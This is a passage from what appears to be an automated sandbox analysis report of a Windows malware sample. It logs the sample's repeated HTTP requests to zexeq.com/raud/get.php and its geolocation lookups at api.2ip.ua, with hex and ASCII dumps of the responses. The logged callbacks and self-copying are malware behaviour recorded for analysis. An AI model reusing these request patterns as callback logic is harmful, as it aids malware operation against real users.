                                                                                                      Data Raw: 33 38 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6e 37 35 78 75 76 48 31 72 75 75 68 35 77 75 53 61 64 31 4f 50 35 77 4e 6d 37 4c 73 6f 6c 5a 78 7a 4d 57 4d 67 72 64 6d 43 6b 72 6a 46 6d 47 49 30 4b 4c 43 41 78 62 75 42 48 6e 7a 54 4f 69 6c 54 2f 68 36 70 73 32 72 71 70 42 71 4e 6b 74 71 57 68 44 58 75 41 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 27 6f 70 61 63 69
                                                                                                      Data Ascii: 383<!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_n75xuvH1ruuh5wuSad1OP5wNm7LsolZxzMWMgrdmCkrjFmGI0KLCAxbuBHnzTOilT/h6ps2rqpBqNktqWhDXuA=="><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style='opaci
                                                                                                      Feb 12, 2024 01:35:58.402254105 CET441INData Raw: 74 79 3a 20 30 27 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 70 61 72 6b 20 3d 20 22 65 79 4a 31 64 57 6c 6b 49 6a 6f 69 4d 6d 51 33 4e 47 59 77 59 32 51 74 4e 47 5a 6d 4d 53 31 6a 4d 6a 63 7a 4c 54 4d 7a 5a 6a 45 74 5a 6a
                                                                                                      Data Ascii: ty: 0'></div><script>window.park = "eyJ1dWlkIjoiMmQ3NGYwY2QtNGZmMS1jMjczLTMzZjEtZjNmMTEyNmU3OThjIiwicGFnZV90aW1lIjoxNzA3Njk4MTU4LCJwYWdlX3VybCI6Imh0dHA6XC9cL3pleGVxLmNvbVwvcmF1ZFwvZ2V0LnBocD9waWQ9RjhBRkNEQzRFODAwQTMzMTlGRkIzNDNFODMwOTk2MzciLCJ
                                                                                                      Feb 12, 2024 01:35:58.402290106 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0
                                                                                                      Feb 12, 2024 01:36:03.479585886 CET187OUTGET /raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1
                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                      Host: zexeq.com
                                                                                                      Cookie: parking_session=2d74f0cd-4ff1-c273-33f1-f3f1126e798c
                                                                                                      Feb 12, 2024 01:36:03.598073959 CET1286INHTTP/1.1 200 OK
                                                                                                      Server: openresty
                                                                                                      Date: Mon, 12 Feb 2024 00:36:03 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: keep-alive
                                                                                                      Set-Cookie: parking_session=2d74f0cd-4ff1-c273-33f1-f3f1126e798c; expires=Mon, 12 Feb 2024 00:51:03 GMT; Max-Age=900; path=/; HttpOnly
                                                                                                      X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_n75xuvH1ruuh5wuSad1OP5wNm7LsolZxzMWMgrdmCkrjFmGI0KLCAxbuBHnzTOilT/h6ps2rqpBqNktqWhDXuA==
                                                                                                      Cache-Control: no-cache
                                                                                                      Accept-CH: sec-ch-prefers-color-scheme
                                                                                                      Critical-CH: sec-ch-prefers-color-scheme
                                                                                                      Vary: sec-ch-prefers-color-scheme
                                                                                                      Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                      Cache-Control: no-store, must-revalidate
                                                                                                      Cache-Control: post-check=0, pre-check=0
                                                                                                      Pragma: no-cache
                                                                                                      Data Raw: 33 38 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6e 37 35 78 75 76 48 31 72 75 75 68 35 77 75 53 61 64 31 4f 50 35 77 4e 6d 37 4c 73 6f 6c 5a 78 7a 4d 57 4d 67 72 64 6d 43 6b 72 6a 46 6d 47 49 30 4b 4c 43 41 78 62 75 42 48 6e 7a 54 4f 69 6c 54 2f 68 36 70 73 32 72 71 70 42 71 4e 6b 74 71 57 68 44 58 75 41 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 27 6f 70 61 63 69
                                                                                                      Data Ascii: 383<!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_n75xuvH1ruuh5wuSad1OP5wNm7LsolZxzMWMgrdmCkrjFmGI0KLCAxbuBHnzTOilT/h6ps2rqpBqNktqWhDXuA=="><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style='opaci
                                                                                                      Feb 12, 2024 01:36:03.598182917 CET441INData Raw: 74 79 3a 20 30 27 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 70 61 72 6b 20 3d 20 22 65 79 4a 31 64 57 6c 6b 49 6a 6f 69 4d 6d 51 33 4e 47 59 77 59 32 51 74 4e 47 5a 6d 4d 53 31 6a 4d 6a 63 7a 4c 54 4d 7a 5a 6a 45 74 5a 6a
                                                                                                      Data Ascii: ty: 0'></div><script>window.park = "eyJ1dWlkIjoiMmQ3NGYwY2QtNGZmMS1jMjczLTMzZjEtZjNmMTEyNmU3OThjIiwicGFnZV90aW1lIjoxNzA3Njk4MTYzLCJwYWdlX3VybCI6Imh0dHA6XC9cL3pleGVxLmNvbVwvcmF1ZFwvZ2V0LnBocD9waWQ9RjhBRkNEQzRFODAwQTMzMTlGRkIzNDNFODMwOTk2MzciLCJ
                                                                                                      Feb 12, 2024 01:36:03.598205090 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0
                                                                                                      Feb 12, 2024 01:36:09.965564013 CET187OUTGET /raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1
                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                      Host: zexeq.com
                                                                                                      Cookie: parking_session=2d74f0cd-4ff1-c273-33f1-f3f1126e798c
                                                                                                      Feb 12, 2024 01:36:10.084898949 CET1286INHTTP/1.1 200 OK
                                                                                                      Server: openresty
                                                                                                      Date: Mon, 12 Feb 2024 00:36:10 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: keep-alive
                                                                                                      Set-Cookie: parking_session=2d74f0cd-4ff1-c273-33f1-f3f1126e798c; expires=Mon, 12 Feb 2024 00:51:10 GMT; Max-Age=900; path=/; HttpOnly
                                                                                                      X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_n75xuvH1ruuh5wuSad1OP5wNm7LsolZxzMWMgrdmCkrjFmGI0KLCAxbuBHnzTOilT/h6ps2rqpBqNktqWhDXuA==
                                                                                                      Cache-Control: no-cache
                                                                                                      Accept-CH: sec-ch-prefers-color-scheme
                                                                                                      Critical-CH: sec-ch-prefers-color-scheme
                                                                                                      Vary: sec-ch-prefers-color-scheme
                                                                                                      Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                      Cache-Control: no-store, must-revalidate
                                                                                                      Cache-Control: post-check=0, pre-check=0
                                                                                                      Pragma: no-cache
                                                                                                      Data Raw: 33 38 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6e 37 35 78 75 76 48 31 72 75 75 68 35 77 75 53 61 64 31 4f 50 35 77 4e 6d 37 4c 73 6f 6c 5a 78 7a 4d 57 4d 67 72 64 6d 43 6b 72 6a 46 6d 47 49 30 4b 4c 43 41 78 62 75 42 48 6e 7a 54 4f 69 6c 54 2f 68 36 70 73 32 72 71 70 42 71 4e 6b 74 71 57 68 44 58 75 41 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 27 6f 70 61 63 69
                                                                                                      Data Ascii: 383<!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_n75xuvH1ruuh5wuSad1OP5wNm7LsolZxzMWMgrdmCkrjFmGI0KLCAxbuBHnzTOilT/h6ps2rqpBqNktqWhDXuA=="><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style='opaci
                                                                                                      Feb 12, 2024 01:36:10.084955931 CET441INData Raw: 74 79 3a 20 30 27 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 70 61 72 6b 20 3d 20 22 65 79 4a 31 64 57 6c 6b 49 6a 6f 69 4d 6d 51 33 4e 47 59 77 59 32 51 74 4e 47 5a 6d 4d 53 31 6a 4d 6a 63 7a 4c 54 4d 7a 5a 6a 45 74 5a 6a
                                                                                                      Data Ascii: ty: 0'></div><script>window.park = "eyJ1dWlkIjoiMmQ3NGYwY2QtNGZmMS1jMjczLTMzZjEtZjNmMTEyNmU3OThjIiwicGFnZV90aW1lIjoxNzA3Njk4MTcwLCJwYWdlX3VybCI6Imh0dHA6XC9cL3pleGVxLmNvbVwvcmF1ZFwvZ2V0LnBocD9waWQ9RjhBRkNEQzRFODAwQTMzMTlGRkIzNDNFODMwOTk2MzciLCJ
                                                                                                      Feb 12, 2024 01:36:10.084992886 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0
                                                                                                      Feb 12, 2024 01:36:15.166464090 CET187OUTGET /raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1
                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                      Host: zexeq.com
                                                                                                      Cookie: parking_session=2d74f0cd-4ff1-c273-33f1-f3f1126e798c
                                                                                                      Feb 12, 2024 01:36:15.284982920 CET1286INHTTP/1.1 200 OK
                                                                                                      Server: openresty
                                                                                                      Date: Mon, 12 Feb 2024 00:36:15 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: keep-alive
                                                                                                      Set-Cookie: parking_session=2d74f0cd-4ff1-c273-33f1-f3f1126e798c; expires=Mon, 12 Feb 2024 00:51:15 GMT; Max-Age=900; path=/; HttpOnly
                                                                                                      X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_n75xuvH1ruuh5wuSad1OP5wNm7LsolZxzMWMgrdmCkrjFmGI0KLCAxbuBHnzTOilT/h6ps2rqpBqNktqWhDXuA==
                                                                                                      Cache-Control: no-cache
                                                                                                      Accept-CH: sec-ch-prefers-color-scheme
                                                                                                      Critical-CH: sec-ch-prefers-color-scheme
                                                                                                      Vary: sec-ch-prefers-color-scheme
                                                                                                      Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                      Cache-Control: no-store, must-revalidate
                                                                                                      Cache-Control: post-check=0, pre-check=0
                                                                                                      Pragma: no-cache
                                                                                                      Data Raw: 33 38 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6e 37 35 78 75 76 48 31 72 75 75 68 35 77 75 53 61 64 31 4f 50 35 77 4e 6d 37 4c 73 6f 6c 5a 78 7a 4d 57 4d 67 72 64 6d 43 6b 72 6a 46 6d 47 49 30 4b 4c 43 41 78 62 75 42 48 6e 7a 54 4f 69 6c 54 2f 68 36 70 73 32 72 71 70 42 71 4e 6b 74 71 57 68 44 58 75 41 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 27 6f 70 61 63 69
                                                                                                      Data Ascii: 383<!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_n75xuvH1ruuh5wuSad1OP5wNm7LsolZxzMWMgrdmCkrjFmGI0KLCAxbuBHnzTOilT/h6ps2rqpBqNktqWhDXuA=="><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style='opaci
                                                                                                      Feb 12, 2024 01:36:15.285053015 CET441INData Raw: 74 79 3a 20 30 27 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 70 61 72 6b 20 3d 20 22 65 79 4a 31 64 57 6c 6b 49 6a 6f 69 4d 6d 51 33 4e 47 59 77 59 32 51 74 4e 47 5a 6d 4d 53 31 6a 4d 6a 63 7a 4c 54 4d 7a 5a 6a 45 74 5a 6a
                                                                                                      Data Ascii: ty: 0'></div><script>window.park = "eyJ1dWlkIjoiMmQ3NGYwY2QtNGZmMS1jMjczLTMzZjEtZjNmMTEyNmU3OThjIiwicGFnZV90aW1lIjoxNzA3Njk4MTc1LCJwYWdlX3VybCI6Imh0dHA6XC9cL3pleGVxLmNvbVwvcmF1ZFwvZ2V0LnBocD9waWQ9RjhBRkNEQzRFODAwQTMzMTlGRkIzNDNFODMwOTk2MzciLCJ
                                                                                                      Feb 12, 2024 01:36:15.285073996 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      HTTPS Proxied Packets

                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      0192.168.2.449729104.21.65.244436828C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-02-12 00:35:53 UTC85OUTGET /geo.json HTTP/1.1
                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                      Host: api.2ip.ua
                                                                                                      2024-02-12 00:35:54 UTC895INHTTP/1.1 200 OK
                                                                                                      Date: Mon, 12 Feb 2024 00:35:54 GMT
                                                                                                      Content-Type: application/json
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      strict-transport-security: max-age=63072000; preload
                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                      x-content-type-options: nosniff
                                                                                                      x-xss-protection: 1; mode=block; report=...
                                                                                                      access-control-allow-origin: *
                                                                                                      access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                      access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PCP69XVCcTY%2FSZppwqlgRQLdfDrjz9BuBTj9f9ejtk5fxxKKXNf5o3UjZ%2BWnaM6tKoXKc%2Fqc1Y6uwkhaFB%2F9zY%2FK7aiady%2F3mRHLwgexzPQaluUQsR2BBbCDhuLS"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8540c1166ed206e2-ATL
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      2024-02-12 00:35:54 UTC461INData Raw: 31 63 36 0d 0a 7b 22 69 70 22 3a 22 38 31 2e 31 38 31 2e 35 37 2e 37 34 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 47 65 6f 72 67 69 61 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 34 5c 75 30 34 33 36 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 34 5c 75 30 34 33 36 5c 75 30 34 33 38 5c 75 30 34 34 66 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 34 5c
                                                                                                      Data Ascii: 1c6{"ip":"81.181.57.74","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"Georgia","region_rus":"\u0414\u0436\u043e\u0440\u0434\u0436\u0438\u044f","region_ua":"\u0414\
                                                                                                      2024-02-12 00:35:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1192.168.2.449730104.21.65.244436956C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-02-12 00:35:55 UTC85OUTGET /geo.json HTTP/1.1
                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                      Host: api.2ip.ua
                                                                                                      2024-02-12 00:35:55 UTC889INHTTP/1.1 200 OK
                                                                                                      Date: Mon, 12 Feb 2024 00:35:55 GMT
                                                                                                      Content-Type: application/json
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      strict-transport-security: max-age=63072000; preload
                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                      x-content-type-options: nosniff
                                                                                                      x-xss-protection: 1; mode=block; report=...
                                                                                                      access-control-allow-origin: *
                                                                                                      access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                      access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wSXfyqqOTHyH6X5EdZc%2BiBc3o7huV8vyMsFPB4zxkXpp9nTVbbJVTeuE8uJytsobYRfbzQWDoOe4dcQyu%2FHrLtKrI2f%2BqtAxITwlqNsswX0iACWJK9vpIhtDLaXf"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8540c1204ac54588-ATL
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      2024-02-12 00:35:55 UTC461INData Raw: 31 63 36 0d 0a 7b 22 69 70 22 3a 22 38 31 2e 31 38 31 2e 35 37 2e 37 34 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 47 65 6f 72 67 69 61 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 34 5c 75 30 34 33 36 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 34 5c 75 30 34 33 36 5c 75 30 34 33 38 5c 75 30 34 34 66 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 34 5c
                                                                                                      Data Ascii: 1c6{"ip":"81.181.57.74","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"Georgia","region_rus":"\u0414\u0436\u043e\u0440\u0434\u0436\u0438\u044f","region_ua":"\u0414\
                                                                                                      2024-02-12 00:35:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2192.168.2.449733104.21.65.244435776C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-02-12 00:35:57 UTC85OUTGET /geo.json HTTP/1.1
                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                      Host: api.2ip.ua
                                                                                                      2024-02-12 00:35:58 UTC893INHTTP/1.1 200 OK
                                                                                                      Date: Mon, 12 Feb 2024 00:35:57 GMT
                                                                                                      Content-Type: application/json
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      strict-transport-security: max-age=63072000; preload
                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                      x-content-type-options: nosniff
                                                                                                      x-xss-protection: 1; mode=block; report=...
                                                                                                      access-control-allow-origin: *
                                                                                                      access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                      access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3VRe9kU%2BVBw7OuHms7SHMB12TyZOY0iz3x7kei7qVvMLdVxzKd%2BKvt1BPZ4V20ZcM1VPo8Je%2BLH8flIxg7fDJGjjFfVXO%2FBWXobLE0theSTNtS69%2FWLHjleM6Jkh"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8540c12d9e5d4542-ATL
                                                                                                      alt-svc: h3=":443"; ma=86400
